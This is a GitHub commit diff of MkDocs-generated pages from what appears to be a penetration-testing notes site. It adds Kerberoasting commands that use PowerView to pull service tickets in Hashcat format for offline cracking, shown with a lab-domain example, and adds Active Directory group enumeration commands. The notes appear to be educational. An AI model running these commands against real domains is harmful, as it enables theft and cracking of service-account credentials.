Skip to content

Commit

Permalink
Deployed d9210a1 with MkDocs version: 1.6.1
Browse files Browse the repository at this point in the history
  • Loading branch information
Unknown committed Jan 2, 2025
1 parent 97a14d4 commit 0da0137
Show file tree
Hide file tree
Showing 12 changed files with 18,558 additions and 1,131 deletions.
28 changes: 19 additions & 9 deletions active-directory-from-windows-privilege-escalation/index.html
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17623,15 +17623,25 @@ <h3 id="powerview">PowerView</h3>
</span><span id="__span-9-9"><a id="__codelineno-9-9" name="__codelineno-9-9"></a><span class="nb">Get-NetUser</span> <span class="n">-SPN</span>
</span></code></pre></div></td></tr></table></div>
<p><strong>2.</strong> Generate a TGS ticker for a specific user:</p>
<div class="language-powershell highlight"><table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-10-1">1</a></span>
<span class="normal"><a href="#__codelineno-10-2">2</a></span>
<span class="normal"><a href="#__codelineno-10-3">3</a></span>
<span class="normal"><a href="#__codelineno-10-4">4</a></span>
<span class="normal"><a href="#__codelineno-10-5">5</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-10-1"><a id="__codelineno-10-1" name="__codelineno-10-1"></a><span class="c"># Option 1</span>
<div class="language-powershell highlight"><table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-10-1"> 1</a></span>
<span class="normal"><a href="#__codelineno-10-2"> 2</a></span>
<span class="normal"><a href="#__codelineno-10-3"> 3</a></span>
<span class="normal"><a href="#__codelineno-10-4"> 4</a></span>
<span class="normal"><a href="#__codelineno-10-5"> 5</a></span>
<span class="normal"><a href="#__codelineno-10-6"> 6</a></span>
<span class="normal"><a href="#__codelineno-10-7"> 7</a></span>
<span class="normal"><a href="#__codelineno-10-8"> 8</a></span>
<span class="normal"><a href="#__codelineno-10-9"> 9</a></span>
<span class="normal"><a href="#__codelineno-10-10">10</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-10-1"><a id="__codelineno-10-1" name="__codelineno-10-1"></a><span class="c"># Option 1</span>
</span><span id="__span-10-2"><a id="__codelineno-10-2" name="__codelineno-10-2"></a><span class="nb">Get-DomainUser</span> <span class="n">-Identity</span> <span class="nv">$samAccountName</span> <span class="p">|</span> <span class="nb">Get-DomainSPNTicket</span> <span class="n">-Format</span> <span class="n">Hashcat</span>
</span><span id="__span-10-3"><a id="__codelineno-10-3" name="__codelineno-10-3"></a>
</span><span id="__span-10-4"><a id="__codelineno-10-4" name="__codelineno-10-4"></a><span class="c"># Option 2</span>
</span><span id="__span-10-5"><a id="__codelineno-10-5" name="__codelineno-10-5"></a><span class="nb">Get-DomainSPNTicket</span> <span class="n">-SPN</span> <span class="nv">$samAccountName</span> <span class="n">-OutputFormat</span> <span class="n">Hashcat</span> <span class="p">|</span> <span class="nb">select </span><span class="n">-ExpandProperty</span> <span class="n">Hash</span> <span class="p">&gt;</span> <span class="n">file</span><span class="p">.</span><span class="n">txt</span>
</span><span id="__span-10-3"><a id="__codelineno-10-3" name="__codelineno-10-3"></a><span class="c"># Example: </span>
</span><span id="__span-10-4"><a id="__codelineno-10-4" name="__codelineno-10-4"></a><span class="c"># Get-DomainUser -Identity MSSQLSvc/SQL01.inlanefreight.local:1433 | Get-DomainSPNTicket -Format Hashcat</span>
</span><span id="__span-10-5"><a id="__codelineno-10-5" name="__codelineno-10-5"></a>
</span><span id="__span-10-6"><a id="__codelineno-10-6" name="__codelineno-10-6"></a>
</span><span id="__span-10-7"><a id="__codelineno-10-7" name="__codelineno-10-7"></a><span class="c"># Option 2</span>
</span><span id="__span-10-8"><a id="__codelineno-10-8" name="__codelineno-10-8"></a><span class="nb">Get-DomainSPNTicket</span> <span class="n">-SPN</span> <span class="nv">$samAccountName</span> <span class="n">-OutputFormat</span> <span class="n">Hashcat</span> <span class="p">|</span> <span class="nb">select </span><span class="n">-ExpandProperty</span> <span class="n">Hash</span> <span class="p">&gt;</span> <span class="n">file</span><span class="p">.</span><span class="n">txt</span>
</span><span id="__span-10-9"><a id="__codelineno-10-9" name="__codelineno-10-9"></a><span class="c"># Example: </span>
</span><span id="__span-10-10"><a id="__codelineno-10-10" name="__codelineno-10-10"></a><span class="c"># Get-DomainSPNTicket -SPN MSSQLSvc/SQL01.inlanefreight.local:1433 -OutputFormat Hashcat | select -ExpandProperty Hash &gt; file.txt</span>
</span></code></pre></div></td></tr></table></div>
<p><strong>3.</strong> Or obtain all SPN TGS tickets and export them to a CSV</p>
<div class="language-text highlight"><table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-11-1">1</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-11-1"><a id="__codelineno-11-1" name="__codelineno-11-1"></a>Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\FileName.csv -NoTypeInformation
Expand Down Expand Up @@ -18900,7 +18910,7 @@ <h2 id="mitigations_1">Mitigations</h2>

<!-- This section adds support for localized revision dates -->

<small>Last update: <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-timeago"><span class="timeago" datetime="2025-01-01T20:37:04+00:00" locale="en"></span></span><span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-iso_date">2025-01-01</span></small></br>
<small>Last update: <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-timeago"><span class="timeago" datetime="2025-01-02T19:07:53+00:00" locale="en"></span></span><span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-iso_date">2025-01-02</span></small></br>


<small>Created: December 27, 2024 22:00:41</small>
Expand Down
24 changes: 15 additions & 9 deletions activedirectory-powershell-module/index.html
View file
Original file line number Diff line number Diff line change
Expand Up @@ -17247,21 +17247,27 @@ <h3 id="get-adcomputer">Get-ADComputer</h3>
</span><span id="__span-6-2"><a id="__codelineno-6-2" name="__codelineno-6-2"></a><span class="nb">Get-ADComputer</span> <span class="n">-Filter</span> <span class="s2">&quot;DNSHostName -like &#39;SQL*&#39;&quot;</span>
</span></code></pre></div></td></tr></table></div>
<h3 id="get-adgroup">Get-ADGroup</h3>
<div class="language-powershell highlight"><table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-7-1">1</a></span>
<span class="normal"><a href="#__codelineno-7-2">2</a></span>
<span class="normal"><a href="#__codelineno-7-3">3</a></span>
<span class="normal"><a href="#__codelineno-7-4">4</a></span>
<span class="normal"><a href="#__codelineno-7-5">5</a></span>
<span class="normal"><a href="#__codelineno-7-6">6</a></span>
<span class="normal"><a href="#__codelineno-7-7">7</a></span>
<span class="normal"><a href="#__codelineno-7-8">8</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-7-1"><a id="__codelineno-7-1" name="__codelineno-7-1"></a><span class="c"># Group enumeration</span>
<div class="language-powershell highlight"><table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-7-1"> 1</a></span>
<span class="normal"><a href="#__codelineno-7-2"> 2</a></span>
<span class="normal"><a href="#__codelineno-7-3"> 3</a></span>
<span class="normal"><a href="#__codelineno-7-4"> 4</a></span>
<span class="normal"><a href="#__codelineno-7-5"> 5</a></span>
<span class="normal"><a href="#__codelineno-7-6"> 6</a></span>
<span class="normal"><a href="#__codelineno-7-7"> 7</a></span>
<span class="normal"><a href="#__codelineno-7-8"> 8</a></span>
<span class="normal"><a href="#__codelineno-7-9"> 9</a></span>
<span class="normal"><a href="#__codelineno-7-10">10</a></span>
<span class="normal"><a href="#__codelineno-7-11">11</a></span></pre></div></td><td class="code"><div><pre><span></span><code><span id="__span-7-1"><a id="__codelineno-7-1" name="__codelineno-7-1"></a><span class="c"># Group enumeration</span>
</span><span id="__span-7-2"><a id="__codelineno-7-2" name="__codelineno-7-2"></a><span class="nb">Get-ADGroup</span> <span class="n">-Filter</span> <span class="p">*</span> <span class="p">|</span> <span class="nb">select </span><span class="n">name</span>
</span><span id="__span-7-3"><a id="__codelineno-7-3" name="__codelineno-7-3"></a>
</span><span id="__span-7-4"><a id="__codelineno-7-4" name="__codelineno-7-4"></a><span class="c"># Get detailed information about a group</span>
</span><span id="__span-7-5"><a id="__codelineno-7-5" name="__codelineno-7-5"></a><span class="nb">Get-ADGroup</span> <span class="n">-Identity</span> <span class="s2">&quot;Backup Operators&quot;</span>
</span><span id="__span-7-6"><a id="__codelineno-7-6" name="__codelineno-7-6"></a>
</span><span id="__span-7-7"><a id="__codelineno-7-7" name="__codelineno-7-7"></a><span class="c"># Search for administrative groups by filtering on the `adminCount` attribute. If set to `1`, it&#39;s protected by AdminSDHolder and known as protected groups. `AdminSDHolder` is owned by the Domain Admins group. It has the privileges to change the permissions of objects in Active Directory. </span>
</span><span id="__span-7-8"><a id="__codelineno-7-8" name="__codelineno-7-8"></a><span class="nb">Get-ADGroup</span> <span class="n">-Filter</span> <span class="s2">&quot;adminCount -eq 1&quot;</span> <span class="p">|</span> <span class="nb">select </span><span class="n">Name</span>
</span><span id="__span-7-9"><a id="__codelineno-7-9" name="__codelineno-7-9"></a>
</span><span id="__span-7-10"><a id="__codelineno-7-10" name="__codelineno-7-10"></a><span class="c"># Viewing the Protected Users Group with Get-ADGroup</span>
</span><span id="__span-7-11"><a id="__codelineno-7-11" name="__codelineno-7-11"></a><span class="nb">Get-ADGroup</span> <span class="n">-Identity</span> <span class="s2">&quot;Protected Users&quot;</span> <span class="n">-Properties</span> <span class="n">Name</span><span class="p">,</span><span class="n">Description</span><span class="p">,</span><span class="n">Members</span>
</span></code></pre></div></td></tr></table></div>
<h3 id="get-adgroupmember">Get-ADGroupMember</h3>
<div class="language-powershell highlight"><table class="highlighttable"><tr><td class="linenos"><div class="linenodiv"><pre><span></span><span class="normal"><a href="#__codelineno-8-1">1</a></span>
Expand All @@ -17275,7 +17281,7 @@ <h3 id="get-adtrust">Get-ADTrust</h3>

<!-- This section adds support for localized revision dates -->

<small>Last update: <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-timeago"><span class="timeago" datetime="2025-01-01T20:37:04+00:00" locale="en"></span></span><span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-iso_date">2025-01-01</span></small></br>
<small>Last update: <span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-timeago"><span class="timeago" datetime="2025-01-02T19:07:53+00:00" locale="en"></span></span><span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-iso_date">2025-01-02</span></small></br>


<small>Created: May 9, 2023 17:16:52</small>
Expand Down
Loading

0 comments on commit 0da0137

Please sign in to comment.